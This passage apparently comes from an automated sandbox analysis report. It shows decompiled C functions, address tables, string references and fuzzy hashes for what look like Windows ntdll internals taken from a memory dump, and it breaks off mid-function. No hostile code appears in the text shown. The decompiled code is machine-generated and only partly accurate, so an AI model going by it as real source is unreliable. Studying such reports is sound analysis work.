0x0304f0e7
0x0304f0f2
0x0304f0f4
0x0304f0f8
0x0304f100
0x0304f108
0x0304f10d
0x0304f115
0x0304f116
0x0304f11f
0x0304f123
0x0304f124
0x0304f12c
0x0304f130
0x0304f134
0x0304f13d
0x0304f144
0x0304f14b
0x0304f152
0x0308bab0
0x0308bab0
0x0304f158
0x0304f158
0x0304f15a
0x0304f160
0x0304f165
0x0304f166
0x0304f16f
0x0304f173
0x0308baa7
0x0308baa7
0x0308baab
0x00000000
0x0304f179
0x0304f18d
0x0304f191
0x0308baa2
0x00000000
0x0304f197
0x0304f19b
0x0304f1a2
0x0304f1a9
0x0304f1af
0x0304f1b2
0x0304f1b6
0x0304f1b9
0x0304f1c4
0x0304f1d8
0x0304f1df
0x0304f1e3
0x0304f1eb
0x0304f1ee
0x0304f1f4
0x0304f20f
0x0308bab7
0x0308babb
0x0308bacc
0x0308bad1
0x0304f215
0x0304f218
0x0304f226
0x0304f22b
0x00000000
0x0304f22b
0x0304f1f6
0x0304f1f6
0x0304f1f9
0x0304f1fb
0x0304f1fb
0x0304f1f4
0x0304f191
0x0304f173
0x0304f152
0x0304f203

Strings

@, xrefs: 0304F124

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 097f4e14b603868b0bdbf8096928a3bf823d1a5fac14a22c0e2116becc6c178d
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 51516E755057119FC321DF19C840AABBBF8FF88710F00892DF9959B6A0E7B4E914CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 03093540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E03093540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x310d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E03050BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E03093706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0305FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E03093540;
						E0305FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0306DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E030A0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E030597C0();
					}
					return E0305B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E03093971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E03093884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0305FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E03059650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E03093787(_a4,  &_v352, _t80);
						}
					}
					L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E030595D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x03093552
0x0309355a
0x0309355d
0x03093566
0x03093567
0x0309357e
0x0309358f
0x030935a1
0x030935a5
0x0309366b
0x0309366b
0x0309366d
0x03093672
0x03093679
0x03093685
0x0309368d
0x0309369d
0x030936a7
0x030936b8
0x030936c6
0x030936c7
0x030936dc
0x030936e1
0x030936e7
0x030936e9
0x030936e9
0x03093703
0x03093703
0x030935b5
0x030935c0
0x030935c4
0x00000000
0x00000000
0x030935ca
0x030935d7
0x030935e2
0x030935e6
0x030935e8
0x030935f5
0x030935fa
0x03093603
0x03093604
0x03093609
0x0309360a
0x03093612
0x03093613
0x0309361e
0x03093622
0x03093628
0x0309362f
0x0309362f
0x03093636
0x03093638
0x0309363b
0x03093642
0x03093642
0x03093636
0x03093657
0x03093657
0x0309365c
0x03093662
0x03093669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0309358F

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: a3150b8d79959e2c549070b736ceee6d80f6877d61b62d2b0db7c757206752b2
Instruction ID: 8682f9312e2c485ef1e2136cb30fb35c0a1acb8020915644e35532684765cf73
Opcode Fuzzy Hash: a3150b8d79959e2c549070b736ceee6d80f6877d61b62d2b0db7c757206752b2
Instruction Fuzzy Hash: 004134B5D0262D9BEF21DA50CC84FDFB77CAB44714F0085D6EA09AB240DB315E888F95

Uniqueness

Uniqueness Score: -1.00%

Function 030E05AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E030E05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E030E07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E03059730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E030DA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E030DA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E030E1293(_t79, _v40, E030E07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E03037D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E030D138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x030e05c5
0x030e05ca
0x030e05d3
0x030e06db
0x030e06db
0x030e06dd
0x030e06e3
0x030e06e3
0x030e05dd
0x030e05e7
0x030e05f6
0x030e0600
0x030e0607
0x030e0610
0x030e0615
0x030e061a
0x030e061c
0x030e061e
0x030e0624
0x030e0625
0x030e0627
0x030e0628
0x030e0631
0x030e0640
0x030e064d
0x030e0654
0x030e0654
0x030e0631
0x030e066d
0x030e0674
0x00000000
0x00000000
0x030e0692
0x030e069e
0x030e06b0
0x030e06a0
0x030e06a9
0x030e06a9
0x030e06b8
0x030e06d6
0x030e06d6
0x00000000

Strings

`, xrefs: 030E0633

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 9f48c1571720edd914fd6baf3eb7e3cb2d8be303e4fd4a41db551d28e4dd2b31
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: CB31D3327053456FE720DE25CD45F9BB7D9ABC4754F084629F954DB280D7B0E904CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03093884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E03093884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E03059650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L03034620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E03059650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x03093893
0x03093896
0x03093899
0x0309389f
0x030938a0
0x030938a4
0x030938a9
0x030938ac
0x030938ad
0x030938ae
0x030938af
0x030938b1
0x030938b4
0x030938bb
0x030938bc
0x030938bd
0x030938c4
0x030938c8
0x030938ca
0x030938ca
0x030938d5
0x0309393e
0x03093940
0x03093942
0x03093952
0x03093954
0x03093961
0x03093961
0x03093967
0x0309396e
0x0309396e
0x03093947
0x0309394c
0x00000000
0x0309394c
0x030938ea
0x030938ee
0x030938f8
0x030938f9
0x030938ff
0x03093900
0x03093902
0x03093903
0x0309390b
0x0309390f
0x03093950
0x00000000
0x03093950
0x03093915
0x0309391d
0x0309391d
0x03093922
0x03093926
0x00000000
0x03093928
0x0309392b
0x0309392b
0x03093935
0x03093937
0x03093937
0x00000000
0x03093935
0x03093926
0x030938f0
0x00000000

Strings

BinaryName, xrefs: 030938B4

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 4e523d9af9cf80e1473f2a89054182dc4c86888b19e973f70844c9790e3ed709
Instruction ID: bcaaf4cd8cb7e18e5469e46b7f6dce39673647b5fa40fe0153287b92a76b21d3
Opcode Fuzzy Hash: 4e523d9af9cf80e1473f2a89054182dc4c86888b19e973f70844c9790e3ed709
Instruction Fuzzy Hash: E0310A7AD02619AFEF15DB58C945E7FF7BCEB80720F0541AAE914A7250D7319E00DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0304D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0304D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x310d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E03034120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0305B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E030598D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E030595D0();
					L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0304d29c
0x0304d2a6
0x0304d2b1
0x0304d2b5
0x0304d2b6
0x0304d2bc
0x0304d2bd
0x0304d2be
0x0304d2bf
0x0304d2c2
0x0304d2c4
0x0304d2cc
0x0304d384
0x0304d34b
0x0304d34f
0x0304d350
0x0304d351
0x0304d35c
0x0304d35c
0x0304d2d6
0x0304d2da
0x0304d2e1
0x0304d361
0x0304d369
0x0304d36d
0x0304d2e3
0x0304d2e3
0x0304d2e3
0x0304d2e5
0x0304d2ed
0x0304d2f5
0x0304d2fa
0x0304d302
0x0304d303
0x0304d30b
0x0304d30f
0x0304d313
0x0304d318
0x0304d31c
0x0304d320
0x0304d379
0x0304d37d
0x00000000
0x00000000
0x0308affe
0x0308b001
0x0308b011
0x00000000
0x0304d322
0x0304d322
0x0304d330
0x0304d337
0x0304d35d
0x0304d339
0x0304d33f
0x0304d38c
0x0304d38c
0x0304d33f
0x0304d349
0x00000000
0x0304d349

Strings

@, xrefs: 0304D303

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 5a8f09572ea9270841cf140e4f3e80ea8ced646a4d45737a81c4264061bac066
Instruction ID: 425d2ef6eefdd87147980bf892aedcc47dee33aa25478362a2fee770515eea88
Opcode Fuzzy Hash: 5a8f09572ea9270841cf140e4f3e80ea8ced646a4d45737a81c4264061bac066
Instruction Fuzzy Hash: FF31AFF550A305AFC750DF28C9809AFBBE8EBC9654F04092EF99487211E634DE04CB96

Uniqueness

Uniqueness Score: -1.00%

Function 03021B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E03021B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0305BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0305A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0305A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L03034620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x03021b8f
0x03021b9a
0x03021b9c
0x03021b9e
0x03021ba3
0x03077010
0x03077010
0x00000000
0x03021ba9
0x03021ba9
0x03021bae
0x00000000
0x03021bc5
0x03021bca
0x03021bcf
0x03021bd0
0x03021bd1
0x03021bd2
0x03021bd6
0x03021bdc
0x03021be0
0x03076ffc
0x03077000
0x00000000
0x03077006
0x03077009
0x03077009
0x03021be6
0x03021bec
0x03021c0b
0x03021c0b
0x03021c0c
0x03021c11
0x03021c12
0x03021c15
0x03021c1b
0x03021c1f
0x03021c31
0x03021c33
0x03077026
0x03077026
0x03021c21
0x03021c24
0x03021c24
0x03021bee
0x03021bee
0x03021bf2
0x03021c3a
0x03021bf4
0x03021bf4
0x03021c05
0x03021c05
0x03021c09
0x03021c3e
0x00000000
0x00000000
0x00000000
0x03021c09
0x03021bec
0x03021be0
0x03021bae
0x03021c2e

Strings

WindowsExcludedProcs, xrefs: 03021BC5

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: caa9da9019a2a3cbb30dc0c2001821c28144078e7dc860d0005073cee79a02e4
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 0A21C87A903638EBDB26DA558840FAFBBADAF85A50F294465FD149B200D630DD0197E0

Uniqueness

Uniqueness Score: -1.00%

Function 0303F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0303F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0303f71d
0x0303f722
0x0303f726
0x03084770
0x0303f765
0x0303f769
0x0303f769
0x0303f732
0x0308477a
0x00000000
0x0308477a
0x0303f738
0x0303f73a
0x0303f73c
0x0303f73f
0x0303f746
0x0303f778
0x0303f7a9
0x0303f7a9
0x0303f754
0x0303f75a
0x0303f75d
0x0303f75f
0x0303f761
0x0303f76f
0x0303f771
0x0303f771
0x0303f76f
0x0303f763
0x00000000
0x0303f763
0x0303f77d
0x0303f7a3
0x0303f7a5
0x00000000
0x0303f7a5
0x0303f77f
0x0303f782
0x0303f784
0x0303f786
0x00000000
0x00000000
0x00000000
0x0303f788
0x0303f748
0x0303f74d
0x0303f78d
0x0303f793
0x0303f7b7
0x0303f7bc
0x00000000
0x0303f7bc
0x0303f798
0x00000000
0x00000000
0x0303f79d
0x0303f7b0
0x00000000
0x0303f7b0
0x0303f79f
0x00000000
0x0303f74f
0x0303f74f
0x00000000
0x0303f74f

Strings

Actx , xrefs: 0303F73F

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 131ea864974d0c1961b7eedabf9c607f2c5719a730d82642ed2d1fe51be9e73f
Instruction ID: 6bbe9886e045303f180005c7c5e7753e9744bd2b34e7e8beb202b72a2b698c97
Opcode Fuzzy Hash: 131ea864974d0c1961b7eedabf9c607f2c5719a730d82642ed2d1fe51be9e73f
Instruction Fuzzy Hash: D3118235F07B038BEBA4CE1D8590B7BB2DDAB97664F29493AE465CB391DB70C8418740

Uniqueness

Uniqueness Score: -1.00%

Function 030C8DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E030C8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x30f0d50);
				E0306D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E030A5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0306DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0306DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0306D130(_t34, _t39, _t40);
			}

0x030c8df1
0x030c8df1
0x030c8df1
0x030c8df1
0x030c8df1
0x030c8df1
0x030c8df3
0x030c8df8
0x030c8dfd
0x030c8e00
0x030c8e0e
0x030c8e2a
0x030c8e36
0x030c8e38
0x030c8e3c
0x030c8e46
0x030c8e46
0x030c8e36
0x030c8e50
0x030c8e56
0x030c8e59
0x030c8e5c
0x030c8e60
0x030c8e67
0x030c8e6d
0x030c8e73
0x030c8e74
0x030c8eb1
0x030c8ebd

Strings

Critical error detected %lx, xrefs: 030C8E21

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 95f53a1ed9706c21bf2b943a1f9302d23311cbf31fa3eaad5ef28c82e553fb4e
Instruction ID: ad6e1de3a4d37de0f4ac551cd6498a4549ab6e99b6828167b0c5b7a1977850d0
Opcode Fuzzy Hash: 95f53a1ed9706c21bf2b943a1f9302d23311cbf31fa3eaad5ef28c82e553fb4e
Instruction Fuzzy Hash: 1F115B75D26388DBDF24DFA989057EDBBB0BB44315F24825DD5696F282C3740601CF19

Uniqueness

Uniqueness Score: -1.00%

Function 030AFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 030AFF60

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: e73f96664ffbb077286428a96bda6aa95ef4e89dc32ccdcad59155249ec280ba
Instruction ID: 52ecf7ce514b67a7f0f5a95f6c770dc5208d6b3a27fe538539f43bf6238cdaf4
Opcode Fuzzy Hash: e73f96664ffbb077286428a96bda6aa95ef4e89dc32ccdcad59155249ec280ba
Instruction Fuzzy Hash: 0C11ED75A12A44EFDB26EB94DD48FDCB7B1BF49704F188054E5086B2A1C7789A80DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0301F900, Relevance: .9, Instructions: 863
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E0301F900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
